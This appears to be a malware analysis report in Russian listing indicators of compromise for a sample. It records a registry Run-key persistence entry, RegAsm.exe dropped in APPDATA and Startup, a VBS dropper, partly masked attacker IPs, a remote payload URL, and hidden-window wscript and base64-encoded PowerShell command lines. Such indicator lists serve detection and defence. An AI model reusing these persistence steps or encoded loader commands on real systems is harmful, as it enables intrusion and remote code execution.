Техническая информация
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegAsm' = '%APPDATA%\RegAsm.exe'
- %APPDATA%\microsoft\windows\start menu\programs\startup\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %TEMP%\ixp000.tmp\6908a8c3b0066.vbs
- %APPDATA%\regasm.exe
- %TEMP%\ixp000.tmp\6908a8c3b0066.vbs
- '62.##.226.168':80
- '19#.#17.98.110':7000
- http://62.##.226.168/public_files/ukUfuCQ.txt
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\6908a8c3b0066.vbs"
- '<SYSTEM32>\cmd.exe' /c 6908a8c3b0066.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'